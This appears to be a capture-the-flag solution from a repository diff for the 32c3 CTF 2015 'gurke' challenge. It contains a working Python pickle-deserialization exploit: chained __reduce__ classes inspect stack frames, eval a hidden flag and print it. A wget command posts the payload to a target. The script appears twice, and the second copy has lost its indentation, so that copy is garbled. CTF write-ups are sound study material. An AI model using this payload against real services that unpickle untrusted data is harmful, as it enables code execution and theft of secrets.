shinh · January 4, 2016 04:42
diff --git a/32c3 CTF 2015 gurke b/32c3 CTF 2015 gurke
 $ python gurke.py && wget --post-file t -O /dev/stdout http://<target-ip>/

 It seemed contentstants were supposed to use marshal and base64, but I
 didn't need them.
diff --git a/gurke.py b/gurke.py
 #!/usr/bin/python

 import pickle
 import struct
 import os
 import sys

 import socket
 import pickle
 import base64
 import marshal
 import types
 import inspect
 import encodings.string_escape

 class C1(object):
  def __reduce__(self):
    return (inspect.currentframe, ())

 class C2(object):
  def __reduce__(self):
    return (inspect.getouterframes, (C1(), ))

 class C3(object):
  def __reduce__(self):
    return (reversed, (C2(), ))

 class C4(object):
  def __reduce__(self):
    return (next, (C3(), ))

 class C5(object):
  def __reduce__(self):
    return (reversed, (C4(), ))

 class C6(object):
  def __reduce__(self):
    return (list, (C5(), ))

 class C7(object):
  def __reduce__(self):
    return (reversed, (C6(), ))

 class C8(object):
  def __reduce__(self):
    return (next, (C7(), ))

 class C9(object):
  def __reduce__(self):
    return (inspect.getargvalues, (C8(), ))

 class C10(object):
  def __reduce__(self):
    return (getattr, (C9(), 'locals'))

 class C11(object):
  def __reduce__(self):
    return (dict, (C10(),))

 class C12(object):
  def __reduce__(self):
    return (eval, ('flag.flag', C11()))

 class C13(object):
  def __reduce__(self):
    return (str, (C12(),))

 class D(object):
  def __reduce__(self):
    return (os.write, (2, C13(),))


 c = [D()]

 f = open('t', 'wb')
 f.write(pickle.dumps(c))
 f.close()
	$ python gurke.py && wget --post-file t -O /dev/stdout http://<target-ip>/

	It seemed contentstants were supposed to use marshal and base64, but I
	didn't need them.
	#!/usr/bin/python

	import pickle
	import struct
	import os
	import sys

	import socket
	import pickle
	import base64
	import marshal
	import types
	import inspect
	import encodings.string_escape

	class C1(object):
	def __reduce__(self):
	return (inspect.currentframe, ())

	class C2(object):
	def __reduce__(self):
	return (inspect.getouterframes, (C1(), ))

	class C3(object):
	def __reduce__(self):
	return (reversed, (C2(), ))

	class C4(object):
	def __reduce__(self):
	return (next, (C3(), ))

	class C5(object):
	def __reduce__(self):
	return (reversed, (C4(), ))

	class C6(object):
	def __reduce__(self):
	return (list, (C5(), ))

	class C7(object):
	def __reduce__(self):
	return (reversed, (C6(), ))

	class C8(object):
	def __reduce__(self):
	return (next, (C7(), ))

	class C9(object):
	def __reduce__(self):
	return (inspect.getargvalues, (C8(), ))

	class C10(object):
	def __reduce__(self):
	return (getattr, (C9(), 'locals'))

	class C11(object):
	def __reduce__(self):
	return (dict, (C10(),))

	class C12(object):
	def __reduce__(self):
	return (eval, ('flag.flag', C11()))

	class C13(object):
	def __reduce__(self):
	return (str, (C12(),))

	class D(object):
	def __reduce__(self):
	return (os.write, (2, C13(),))


	c = [D()]

	f = open('t', 'wb')
	f.write(pickle.dumps(c))
	f.close()